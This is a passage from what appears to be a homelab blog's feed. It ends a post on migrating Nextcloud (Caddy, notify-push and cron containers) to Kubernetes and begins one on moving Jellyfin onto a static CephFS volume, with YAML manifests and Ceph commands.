</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">400m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">128Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.caddy }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">initialDelaySeconds</span>: <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.caddy }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span></code></pre></div><p>It doesn&rsquo;t need any of the Secrets and environment variables that the Nextcloud
container needs, and gets its configuration from a <code>Caddyfile</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-config</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">Caddyfile</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      admin off
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      auto_https off
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      log {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        output stdout
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        level INFO
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      servers {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        trusted_proxies static 127.0.0.1/32 300.300.300.1/32
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    :{{ .Values.ports.caddy }} {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      root * /my-apps/nextcloud
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      file_server
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      log {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        output stdout
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        format filter {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          wrap json
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          fields {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            request&gt;headers&gt;Authorization delete
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            request&gt;headers&gt;Cookie delete
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      route /push/* {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          uri strip_prefix /push
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          reverse_proxy http://localhost:{{ .Values.ports.notifyPush }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      @provider-matcher {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        path_regexp ^\/(?:updater|oc[ms]-provider)(?:$|\/)
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      rewrite @provider-matcher {path}/index.php
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      @php-matcher {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        path_regexp ^\/(?:index|remote|public|cron|core\/ajax\/update|status|ocs\/v[12]|updater\/.+|oc[ms]-provider\/.+)\.php(?:$|\/)
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      php_fastcgi @php-matcher localhost:9000 {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        root /var/www/html
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      redir /.well-known/carddav /remote.php/dav/ 301
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      redir /.well-known/caldav /remote.php/dav/ 301
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      redir /.well-known/webfinger /index.php{uri} 301
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      redir /.well-known/nodeinfo /index.php{uri} 301
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      @forbidden {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /.htaccess
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /.user.ini
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /3rdparty/*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /authors
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /build/*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /config/*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /console*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /copying
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /data/*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /db_structure
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /lib/*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /occ
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /README
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /templates/*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /tests/*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              path    /console.php
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      respond @forbidden 404
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    }</span>
</span></span></code></pre></div><p>This config does a couple of things. First, it defines the webapp volume as the
HTTP root and thus serves the content directly. This is so Caddy serves
Nextcloud&rsquo;s static assets. An important piece is the log config, which removes
some secret data like cookies and auth headers from the request log.
Then there&rsquo;s a number of routes, the first one redirecting requests for the
notify-push backend to that container&rsquo;s port. Then there&rsquo;s a rewrite of some
&ldquo;special&rdquo; paths to PHP and the general PHP matcher, which forwards all PHP file
requests to the Nextcloud container. And finally a couple of explicitly
forbidden paths containing files that shouldn&rsquo;t have external access.</p>
<p>Then there&rsquo;s the nextcloud-push container:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-push</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">nextcloud:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;/usr/bin/bash&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-c&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;chmod u+x /var/www/html/custom_apps/notify_push/bin/$(uname -m)/notify_push; /var/www/html/custom_apps/notify_push/bin/$(uname -m)/notify_push&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webapp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/var/www/html</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">128Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">NEXTCLOUD_URL</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;https://cloud.mei-home.net&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">REDIS_URL</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;redis://redis.redis.svc.cluster.local:6379&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">PORT</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;{{ .Values.ports.notifyPush }}&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">DATABASE_URL</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">uri</span>
</span></span></code></pre></div><p>The notify-push component, which is separate from Nextcloud&rsquo;s main codebase,
is their attempt to solve some performance issues. Normally, clients have to
proactively poll the server for changed files. This becomes inefficient fast
even at a small, maximum three connected clients deployment like mine. In
contrast to the majority of Nextcloud, this component was written in Rust for
performance reasons. I&rsquo;ve just checked and did not see much change in the CPU
usage of my Nomad Nextcloud deployment after deploying notify-push for the firs
time, but I still figure: Why not.</p>
<p>There were a couple of problems with this deployment though. The very first
one was the fact that the Rust binaries are located in per-arch directories.
In Nomad that wasn&rsquo;t a problem, I could define the command&rsquo;s path like this:</p>
<pre tabindex="0"><code>/var/www/html/custom_apps/notify_push/bin/${attr.kernel.arch}/notify_push
</code></pre><p>The <code>${attr.kernel.arch}</code> would be replaced with the CPU architecture of the
node the job got scheduled on by Nomad.
I was 100% sure that Kubernetes would have something similar. In fact, I knew
it did. The information is stored in the <code>kubernetes.io/arch</code> label. And you can
get labels into env variables with the <a href="https://kubernetes.io/docs/concepts/workloads/pods/downward-api/">Downward API</a>,
and then you can use env variables in the <code>command</code> via the <code>$(ENV_VAR)</code> syntax.
The problem: The <code>arch</code> label is defined on nodes, not on Pods. And the Downward
API only allows access to Pod labels, not node labels. So I finally had to reach
for the <code>uname -m</code> you see above. I was really surprised that k8s doesn&rsquo;t have
the capability to inject the node&rsquo;s arch into a container&rsquo;s env.</p>
<p>But that wasn&rsquo;t the end of my notify-push problems. Now that it was finally
able to execute the binary, it error&rsquo;d out with this error:</p>
<pre tabindex="0"><code>Error: php_literal_parser::unexpected_token

  × Error while parsing nextcloud config.php
  ╰─▶ Error while parsing &#39;/var/www/html/config/config.php&#39;:
      No valid token found, expected one of boolean literal, integer literal,
      float literal, string literal, &#39;null&#39;, &#39;array&#39; or &#39;[&#39;
    ╭─[22:31]
 21 │           &#39;arguments&#39; =&gt; [
 22 │                   &#39;bucket&#39; =&gt; getenv(&#39;BUCKET_NAME&#39;),
    ·                               ┬
    ·                               ╰── Expected boolean literal, integer literal, float literal, string literal, &#39;null&#39;, &#39;array&#39; or &#39;[&#39;
 23 │                   &#39;autocreate&#39; =&gt; true,
    ╰────
</code></pre><p>Before I had the version using environment variables to provide the Nextcloud
configs needed by the notify-push app, I was providing the <code>config.php</code> file
directly, which is supposed to work as well. I figured I had the file already
anyway, so why not use it?
But it looks like the PHP parser used by notify-push is not capable of
actually executing PHP, it expects the config options to all be set to a static
value.
That&rsquo;s why I ended up using the environment variables supported by the notify-push
binary to set the necessary configuration options.</p>
<p>After all of that, the Pod finally fully started, and I was able to log
in and got all of my files, calendars, contacts and so on.
I also went through the warnings shown in the admin interface and had one
issue I&rsquo;d like to note here. The errors told me that my mail settings had not
been tested, so I went into them and clicked the &ldquo;send test mail&rdquo; button.
This showed an error immediately:</p>
<pre tabindex="0"><code>AxiosError: Request failed with status code 400
</code></pre><p>I had absolutely no idea what it meant, as I knew that my mail server was working
as intended. It turned out that the issue wasn&rsquo;t with the mail server or the
Nextcloud mail config, but just the fact that I had never set a mail address
for the admin account I was working in. &#x1f926;</p>
<p>The last piece of the puzzle is the cron container. As I&rsquo;ve described above,
Nextcloud needs some regularly executed tasks. I&rsquo;m not enough of a web developer
to really have any experience with PHP, but from what I understand, PHP is request-oriented,
so it doesn&rsquo;t have a convenient place to put/execute cron tasks?
Anyway, I needed some way to regularly call the <code>cron.php</code> file to trigger these
regular maintenance tasks. The advise from the <a href="https://docs.nextcloud.com/server/latest/admin_manual/configuration_server/background_jobs_configuration.html">Nextcloud docs</a>
recommend to hit the <code>cron.php</code> file every five minutes. For that, I re-used the
Nextcloud container, because it already has all that&rsquo;s needed onboard:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-cron</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">image</span>: <span style="color:#ae81ff">nextcloud:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;/usr/bin/bash&#34;</span>]
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;/cron-scripts/webcron.sh&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cron-script</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/cron-scripts</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">50m</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">50Mi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">SLEEPTIME</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;5m&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">INITIAL_WAIT</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;10m&#34;</span>
</span></span></code></pre></div><p>But instead of launching php-fpm, I run a simple bash script:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cron-script</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">webcron.sh</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    #!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    echo &#34;$(date): Launched task, sleeping for ${INITIAL_WAIT}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    sleep &#34;${INITIAL_WAIT}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    while true; do
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      curl http://127.0.0.1/cron.php 2&gt;&amp;1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      echo &#34;&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      echo &#34;$(date): Sleeping for ${SLEEPTIME}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      sleep &#34;${SLEEPTIME}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    done</span>
</span></span></code></pre></div><p>This does the task pretty nicely, while staying pretty simple.</p>
<h2 id="conclusion">Conclusion</h2>
<p>This one went quite well. I was expecting more problems, especially considering
that it sometimes looks like mine is the only Nextcloud deployment in the Homelabbing
community which runs without any issues. &#x1f605; I intentionally chose to not muck about with the setup
too much and instead copied my Nomad setup as much as possible, which made for
a relatively smooth migration.
I was reluctant to change too much, because I rely on Nextcloud for a lot of my
&ldquo;I would rather not be without this for more than a weekend&rdquo; needs. So being
a bit conservative with how much I change was in order.</p>
<p>I haven&rsquo;t decided what comes next yet - I might spend next week finishing some
blog post drafts instead of starting anything new, because at this point I&rsquo;ve mostly
got &ldquo;finish during the weekend because I need it during the week&rdquo; stuff left in
the migration.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 18: Migrating Jellyfin</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-18-jellyfin/</link>
      <pubDate>Thu, 20 Feb 2025 23:30:24 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-18-jellyfin/</guid>
      <description>Migrating my Jellyfin instance and media collection to the Kubernetes cluster</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my Jellyfin instance to the k8s cluster.</p>
<p>This is part 19 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>I&rsquo;m running a <a href="https://jellyfin.org/">Jellyfin</a> instance in my Homelab to play
movies and TV shows. I don&rsquo;t have a very fancy setup, no re-encoding or anything
like that. I&rsquo;m just using Direct Play, as I&rsquo;m only watching things on my desktop
computer.</p>
<p>Jellyfin doesn&rsquo;t have any external dependencies at all, so there&rsquo;s only the
Jellyfin Pod itself to be configured. It also doesn&rsquo;t have a proper configuration
file. Instead, it&rsquo;s configured through the web UI and a couple of command line
options. For that reason, I won&rsquo;t have any Secrets or ConfigMaps. Instead I&rsquo;ve
just got a PVC with the config and some space for Jellyfin&rsquo;s cache and another
CephFS volume for the media collection.</p>
<p>Said media collection volume will be the main focus of this post, because
everything else about the setup follows my standard k8s app setup pretty closely.
I had originally planned to also dive a bit (okay, a lot &#x1f605;) into
the metrics of the copy operation, but that rather quickly turned into a
rabbit hole all its own, and so I decided to declare the beginning of operation
&ldquo;articles, not tomes&rdquo; and split it out into another post that will follow
shortly after this one.</p>
<h2 id="setting-up-the-media-volume">Setting up the media volume</h2>
<p>For my media volume, I had been using a CephFS volume in the Nomad job setup.
I&rsquo;ve had two reasons for this:</p>
<ol>
<li>I need to mount the volume twice and access it from two places: The Jellyfin
job, and my main desktop</li>
<li>Having &ldquo;unlimited&rdquo; space</li>
</ol>
<p>Ceph RBD volumes were out of the question, because those always need to have a
size set. They can&rsquo;t just grow over the entire space available in their Ceph
pool. CephFS volumes are different, though. By default, they don&rsquo;t have any
size restriction and can use the entire data pool of the CephFS they&rsquo;ve been
created on. This allows me to not have to worry about whether I need to extend
the size at some point.
At the same time, I also regularly copy new files onto the disk when expanding
my media collection. This happens from my desktop. So I also need to have the
ability to mount the volume on two machines at the same time, and write to it
at the same time too.</p>
<p>These two points make CephFS the perfect fit for the media volume. But it left
me with a problem: I needed a k8s PVC to mount into the Jellyfin Pod. But by
default, PVCs always have to have a capacity set. In my initial tests, I tried
just removing the size in the manifest for a test PVC, but k8s rejected it when
I tried to apply it. The same thing happened when I instead set the size to 0.</p>
<p>So back to the drawing board it was. Luckily for me, <a href="https://beyondwatts.social/@beyondwatts">@beyondwatts</a>
pointed me to static PVCs, which can be used to make manually created CephFS
and RBD volumes available as PVCs in Kubernetes. This seems to be a feature of
the <a href="https://github.com/ceph/ceph-csi">Ceph CSI</a>. The documentation for the
feature can be found <a href="https://github.com/ceph/ceph-csi/blob/devel/docs/static-pvc.md">here</a>.</p>
<p>I created my new media volume (technically a <a href="https://docs.ceph.com/en/reef/cephfs/fs-volumes/">CephFS subvolume</a>)
with the following Ceph commands:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph fs subvolumegroup create homelab-fs static-pvcs
</span></span><span style="display:flex;"><span>ceph fs subvolume create homelab-fs media static-pvcs
</span></span></code></pre></div><p>After creation, the <code>ceph fs subvolume info homelab-fs media static-pvcs</code> output
looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;atime&#34;</span>: <span style="color:#e6db74">&#34;2025-02-11 22:46:35&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;bytes_pcent&#34;</span>: <span style="color:#e6db74">&#34;undefined&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;bytes_quota&#34;</span>: <span style="color:#e6db74">&#34;infinite&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;bytes_used&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;created_at&#34;</span>: <span style="color:#e6db74">&#34;2025-02-11 22:46:35&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ctime&#34;</span>: <span style="color:#e6db74">&#34;2025-02-11 22:46:35&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;data_pool&#34;</span>: <span style="color:#e6db74">&#34;homelab-fs-bulk&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;features&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;snapshot-clone&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;snapshot-autoprotect&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;snapshot-retention&#34;</span>
</span></span><span style="display:flex;"><span>    ],
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;flavor&#34;</span>: <span style="color:#ae81ff">2</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;gid&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;mode&#34;</span>: <span style="color:#ae81ff">16877</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;mon_addrs&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;300.300.300.1:6789&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;300.300.300.2:6789&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;300.300.300.3:6789&#34;</span>
</span></span><span style="display:flex;"><span>    ],
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;mtime&#34;</span>: <span style="color:#e6db74">&#34;2025-02-11 22:46:35&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;path&#34;</span>: <span style="color:#e6db74">&#34;/volumes/static-pvcs/media/9a1f1581-6749-4146-a2aa-251fe2b58eca&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;pool_namespace&#34;</span>: <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;state&#34;</span>: <span style="color:#e6db74">&#34;complete&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;type&#34;</span>: <span style="color:#e6db74">&#34;subvolume&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;uid&#34;</span>: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Note especially the <code>bytes_quota: infinite</code> part, which was what I was after.
Next, I created the PersistentVolume for it:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PersistentVolume</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">jellyfin-media</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">accessModes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ReadWriteMany</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">capacity</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storage</span>: <span style="color:#ae81ff">1Gi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">csi</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">driver</span>: <span style="color:#ae81ff">rook-ceph.cephfs.csi.ceph.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">controllerExpandSecretRef</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-csi-cephfs-provisioner</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">nodeStageSecretRef</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-csi-cephfs-node</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumeAttributes</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;fsName&#34;: </span><span style="color:#e6db74">&#34;homelab-fs&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;clusterID&#34;: </span><span style="color:#e6db74">&#34;rook-cluster&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;staticVolume&#34;: </span><span style="color:#e6db74">&#34;true&#34;</span>
